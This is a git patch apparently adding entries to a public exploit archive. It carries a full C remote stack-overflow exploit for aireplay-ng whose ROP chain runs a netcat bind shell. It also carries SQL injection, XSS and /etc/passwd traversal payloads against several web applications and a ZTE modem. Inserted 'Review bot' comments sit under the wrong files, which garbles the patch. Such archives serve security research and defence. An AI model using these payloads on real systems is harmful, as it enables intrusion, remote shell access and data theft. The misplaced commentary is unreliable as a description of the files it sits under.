From 79ad0e1a38a5d6fb1efd94385f2175464166c621 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 4 Nov 2014 04:45:24 +0000
Subject: [PATCH] Updated 11_04_2014
---
 files.csv | 10 ++
 platforms/hardware/webapps/35128.txt | 23 +++++
 platforms/linux/remote/35018.c | 148 +++++++++++++++++++++++++++
 platforms/linux/remote/35148.txt | 9 ++
 platforms/multiple/remote/35144.txt | 9 ++
 platforms/php/webapps/35140.txt | 11 ++
 platforms/php/webapps/35141.txt | 11 ++
 platforms/php/webapps/35142.txt | 7 ++
 platforms/php/webapps/35143.txt | 7 ++
 platforms/php/webapps/35145.txt | 9 ++
 platforms/php/webapps/35149.txt | 9 ++
 11 files changed, 253 insertions(+)
 create mode 100755 platforms/hardware/webapps/35128.txt
 create mode 100755 platforms/linux/remote/35018.c
 create mode 100755 platforms/linux/remote/35148.txt
 create mode 100755 platforms/multiple/remote/35144.txt
 create mode 100755 platforms/php/webapps/35140.txt
 create mode 100755 platforms/php/webapps/35141.txt
 create mode 100755 platforms/php/webapps/35142.txt
 create mode 100755 platforms/php/webapps/35143.txt
 create mode 100755 platforms/php/webapps/35145.txt
 create mode 100755 platforms/php/webapps/35149.txt
diff --git a/files.csv b/files.csv
index 117ccf165..f46a26c55 100755
--- a/files.csv
+++ b/files.csv
@@ -31540,6 +31540,7 @@ id,file,description,date,author,platform,type,port
 35015,platforms/cgi/webapps/35015.txt,"SimpLISTic SQL 2.0 'email.cgi' Cross Site Scripting Vulnerability",2010-11-24,"Aliaksandr Hartsuyeu",cgi,webapps,0
 35016,platforms/php/webapps/35016.txt,"Easy Banner 2009.05.18 member.php Multiple Parameter SQL Injection Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0
 35017,platforms/php/webapps/35017.txt,"Easy Banner 2009.05.18 index.php Multiple Parameter XSS",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0
+35018,platforms/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - ""tcp_test"" Length Parameter Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote,0
 35019,platforms/windows/local/35019.py,"Windows OLE Package Manager SandWorm Exploit",2014-10-20,"Vlad Ovtchinikov",windows,local,0
 35020,platforms/win32/local/35020.rb,"MS14-060 Microsoft Windows OLE Package Manager Code Execution",2014-10-20,metasploit,win32,local,0
 35021,platforms/linux/local/35021.rb,"Linux PolicyKit Race Condition Privilege Escalation",2014-10-20,metasploit,linux,local,0
@@ -31642,6 +31643,7 @@ id,file,description,date,author,platform,type,port
 35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0
 35125,platforms/php/webapps/35125.txt,"Openfiler 'device' Parameter Cross Site Scripting Vulnerability",2010-12-21,db.pub.mail,php,webapps,0
 35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
+35128,platforms/hardware/webapps/35128.txt,"ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Stored XSS Vulnerability",2014-10-31,"Ravi Rajput",hardware,webapps,0
 35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 Cross Site Scripting and Directory Traversal Vulnerabilities",2010-12-21,waraxe,windows,remote,0
 35131,platforms/php/webapps/35131.txt,"Social Share 'username' Parameter SQL Injection Vulnerability",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0
 35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection Vulnerability",2010-12-21,"Jan Fry",linux,remote,0
@@ -31650,3 +31652,11 @@ id,file,description,date,author,platform,type,port
 35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! SQL Injection Vulnerability",2010-12-22,R4dc0re,php,webapps,0
 35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 'email' Parameter Cross Site Scripting Vulnerability",2010-12-22,clshack,php,webapps,0
 35137,platforms/php/webapps/35137.txt,"Social Share 'vote.php' HTTP Response Splitting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
+35140,platforms/php/webapps/35140.txt,"MyBB 1.6 search.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0
+35141,platforms/php/webapps/35141.txt,"MyBB 1.6 private.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0
+35142,platforms/php/webapps/35142.txt,"Social Share 'search' Parameter Cross Site Scripting Vulnerability",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0
+35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability",2010-12-28,"non customers",php,webapps,0
+35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 Cross Site Scripting Vulnerability",2010-12-23,"Gjoko Krstic",multiple,remote,0
+35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0
+35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0
+35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0
diff --git a/platforms/hardware/webapps/35128.txt b/platforms/hardware/webapps/35128.txt
new file mode 100755
index 000000000..1f1f63293
--- /dev/null
+++ b/platforms/hardware/webapps/35128.txt
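Review bot: The added `35143` row indexes a PoC whose request targets `default.asp` (the 35143.txt file added later in this patch) under `platforms/php/webapps` with platform `php`, so the index contradicts the file's own evidence; the platform column should be `asp` and the directory should match it. Anyone filtering or auto-classifying files.csv by the platform column will mis-attribute this entry until the row and path agree with the PoC.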
@@ -0,0 +1,23 @@
+# Exploit Title: ZTE Modem Stored XSS Vulnerability
+# Date: 30-10-2014
+# Exploit Author: Ravi Rajput aka Gr3y n00b IHT team
+# Version: ZXDSL 531BIIV7.3.0f_D09_IN
+# Software Link:http://wwwen.zte.com.cn
+#Tested on : Windows 7
+# code :
+
+GET /ntwksum2.cgi?ntwkPrtcl=3&enblService=1&serviceName=%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.1.1/enblbridge.html
+Cookie: ls_google_allow=1; ls_iserver_timestamp_bnc_bsaved=1414677822551; ctx1420m06d05=7b2273756363657373223a302c226c6f675f616374697665223a307d
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: keep-alive
+
+Attack details :
+The variable aerviceName has been set to simple payload
+
+
diff --git a/platforms/linux/remote/35018.c b/platforms/linux/remote/35018.c
new file mode 100755
index 000000000..788b11455
--- /dev/null
+++ b/platforms/linux/remote/35018.c
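Review bot: The captured request carries an `Authorization: Basic` header, so the stored XSS is reachable only by a client already authenticated to the modem's administration interface, and the header block should record that precondition, e.g. `# Requires: authenticated access to the admin web interface (HTTP Basic)`. The `Cookie:` line holds unrelated browser cookies that add nothing to the PoC and are better left out of a published request. In the 'Attack details' paragraph, `aerviceName` should read `serviceName`, the name of the injected query parameter.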
@@ -0,0 +1,148 @@
+/*
+ * Exploit Title: Aireplay "tcp_test" Length Parameter Inconsistency
+ * Date: 10/3/2014
+ * Exploit Author: Nick Sampanis
+ * Vendor Homepage: http://www.aircrack-ng.org/
+ * Version: Aireplay-ng 1.2 beta3
+ * Tested on: Kali Linux 1.0.9 x64
+ * CVE : CVE-2014-8322
+ * Description: Affected option "aireplay-ng --test"
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include /* See NOTES */
+#include
+#include
+#include
+
+
+#define __packed __attribute__ ((__packed__))
+struct net_hdr {
+ uint8_t nh_type;
+ uint32_t nh_len;
+ uint8_t nh_data[0];
+}__packed;
+
+#define POP_RDI "\xb8\x29\x40\x00\x00\x00\x00\x00"
+#define POP_RBX "\x88\x92\x41\x00\x00\x00\x00\x00"
+#define RPOP_RBX "\x00\x00\x00\x00\x00\x88\x92\x41"
+#define MOV_TO_RDI "\xf3\x47\x41\x00\x00\x00\x00\x00"
+#define COMMAND "nc -l -p 1234 -e /bin/sh\x00"
+#define SYSTEM "\x50\x23\x40\x00\x00\x00\x00\x00"
+#define PAD_BYTES 1304
+
+unsigned char *exploit_init(char *command, size_t size);
+
+int main(int argc, char *argv[])
+{
+ struct net_hdr rh;
+ struct sockaddr_in server, client;
+ unsigned char *exploit;
+ socklen_t len;
+ size_t size;
+ char *command, exec[1024];
+ int sockfd, cl, val = 1;
+
+ printf("[+]Exploit for aireplay-ng tcp_test remote stack overflow\n");
+ printf("[+]Written by Nick Sampanis CVE-2014-8322\n");
+ if (argc == 1) {
+ fprintf(stderr,"[-]Usage: %s port command\n"
+ "[-][Default %s]\n", argv[0], COMMAND);
+ return -1;
+ }
+ if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
+ perror("[-]Socket()");
+ return -1;
+ }
+ memset((char *)&server, '\0', sizeof(server));
+ len = sizeof(server);
+ server.sin_addr.s_addr = 0;
+ server.sin_port = htons(atoi(argv[1]));
+ server.sin_family = AF_INET;
+ if (argv[2])
+ command = argv[2];
+ else
+ command = COMMAND;
+
+ setsockopt(sockfd, SOL_SOCKET,SO_REUSEADDR, &val, sizeof(val));
+ if (bind(sockfd, (struct sockaddr *)&server, sizeof(server)) == -1) {
+ perror("bind()");
+ return -1;
+ }
+ if (listen(sockfd, 5) == -1) {
+ perror("listen()");
+ return -1;
+ }
+ printf("[+]Server is waiting for connections on port %d\n", atoi(argv[1]));
+
+ if (!(size = (strlen(command)+8)*5/4*8+PAD_BYTES+sizeof(rh)))
+ return -1;
+ exploit = exploit_init(command, size);
+ while (1) {
+ if ((cl = accept(sockfd, (struct sockaddr *)&client, &len)) == -1) {
+ perror("[-]Accept");
+ return -1;
+ }
+ printf("[+]Client %s has been connected\n", inet_ntoa(client.sin_addr));
+ if (send(cl, exploit, size, 0) == -1) {
+ perror("[-]Send");
+ return -1;
+ }
+ if (recv(cl, &rh, sizeof(rh), 0) == -1) {
+ perror("[-]Recv");
+ return -1;
+ }
+ close(cl);
+ sleep(1);
+ if (!argv[2]) {
+ printf("[+]Enjoy your shell\n\n");
+ snprintf(exec, sizeof(exec), "nc %s %d",
+ inet_ntoa(client.sin_addr), atoi(argv[1]));
+ system(exec);
+ }
+
+ }
+ close(sockfd);
+ free(exploit);
+
+ return 0;
+}
+
+unsigned char *exploit_init(char *command, size_t size)
+{
+ unsigned long DATA = 0x6265a0;
+ unsigned char *buffer, *exploit;
+ struct net_hdr nh;
+ register int i, j;
+
+ buffer = malloc(size);
+ nh.nh_type = 0x1;
+ nh.nh_len = htonl(size-sizeof(nh));
+ memcpy(buffer, &nh, sizeof(nh));
+ memset(buffer+sizeof(nh), 'A', PAD_BYTES);
+ exploit = buffer+sizeof(nh)+PAD_BYTES;
+
+ for (i = j = 0; j < strlen(command)+4; i+=5) {
+ memcpy(exploit+i*8, POP_RDI, 8);
+ memcpy(exploit+(i+1)*8, &DATA, 8);
+ memcpy(exploit+(i+2)*8, POP_RBX, 8);
+ memcpy(exploit+(i+3)*8, command+j, 8);
+ memcpy(exploit+(i+4)*8, MOV_TO_RDI, 8);
+ DATA += 4;
+ j += 4;
+ }
+ DATA = 0x6265a0; /*.data*/
+ memcpy(exploit+i*8, POP_RDI, 8);
+ memcpy(exploit+(i+1)*8, &DATA, 8);
+ memcpy(exploit+(i+2)*8, SYSTEM, 8);
+
+ return buffer;
+}
+
+
diff --git a/platforms/linux/remote/35148.txt b/platforms/linux/remote/35148.txt
new file mode 100755
index 000000000..d63c83559
--- /dev/null
+++ b/platforms/linux/remote/35148.txt
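Review bot: The header comment names no fixed release, which is the first thing a reader triaging this CVE needs; a line such as ` * Fixed in: <aircrack-ng version — confirm against upstream>` after the ` * CVE :` line would make the file usable as an advisory and not only as a PoC. The header's `Date: 10/3/2014` and title "Length Parameter Inconsistency" also differ from the files.csv row for 35018 in this same patch (2014-10-20, "Stack Overflow"); whichever is authoritative, the two should agree. As rendered here the `#include` directives carry no header names; that is most likely an artifact of how this patch was rendered rather than of the committed file, but it is worth confirming.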
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45582/info
+
+IBM Tivoli Access Manager for e-business is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
+
+IBM Tivoli Access Manager for e-business 6.1.1 is vulnerable.
+
+http://www.example.com/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd
\ No newline at end of file
diff --git a/platforms/multiple/remote/35144.txt b/platforms/multiple/remote/35144.txt
new file mode 100755
index 000000000..21820dd41
--- /dev/null
+++ b/platforms/multiple/remote/35144.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45568/info
+
+Appweb is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Appweb 3.2.2-1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/ejs/%3Cscript%3Ealert%281%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35140.txt b/platforms/php/webapps/35140.txt
new file mode 100755
index 000000000..e43ed7df6
--- /dev/null
+++ b/platforms/php/webapps/35140.txt
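Review bot: The traversal on the last line is written with `%uff0e` sequences rather than `..` or `%2e`, and the description never says so; a reader assessing exposure or writing detection rules needs to know the issue depends on the server accepting non-standard `%u` escapes of the fullwidth full stop (U+FF0E) in the path. Suggest adding, before the URL, `Note: the dot characters are %u-encoded fullwidth full stops (U+FF0E), not literal '..' or %2e%2e.` so that filters and signatures normalising only ASCII dot encodings are not assumed to cover it.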
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/45565/info
+
+MyBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+MyBB 1.6 is vulnerable; other versions may also be affected.
+
+POST /mybb/search.php
+
+action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1
\ No newline at end of file
diff --git a/platforms/php/webapps/35141.txt b/platforms/php/webapps/35141.txt
new file mode 100755
index 000000000..d197b5dad
--- /dev/null
+++ b/platforms/php/webapps/35141.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/45565/info
+
+MyBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+MyBB 1.6 is vulnerable; other versions may also be affected.
+
+POST /mybb/private.php
+
+my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff
\ No newline at end of file
diff --git a/platforms/php/webapps/35142.txt b/platforms/php/webapps/35142.txt
new file mode 100755
index 000000000..4af33db7c
--- /dev/null
+++ b/platforms/php/webapps/35142.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/45566/info
+
+Social Share is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/socialshare/search.php?search=
\ No newline at end of file
diff --git a/platforms/php/webapps/35143.txt b/platforms/php/webapps/35143.txt
new file mode 100755
index 000000000..857260727
--- /dev/null
+++ b/platforms/php/webapps/35143.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/45567/info
+
+HotWeb Scripts HotWeb Rentals is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/default.asp?PageId=-15+union+select+11,22,33,44,55,66,77,88,99+from+users
\ No newline at end of file
diff --git a/platforms/php/webapps/35145.txt b/platforms/php/webapps/35145.txt
new file mode 100755
index 000000000..6cc8ff0f1
--- /dev/null
+++ b/platforms/php/webapps/35145.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45578/info
+
+Pligg CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Pligg CMS 1.1.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cloud.php?range={SQL}
\ No newline at end of file
diff --git a/platforms/php/webapps/35149.txt b/platforms/php/webapps/35149.txt
new file mode 100755
index 000000000..7c264a153
--- /dev/null
+++ b/platforms/php/webapps/35149.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45586/info
+
+LiveZilla is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+LiveZilla 3.2.0.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/livezilla/server.php?request=track&livezilla=
\ No newline at end of file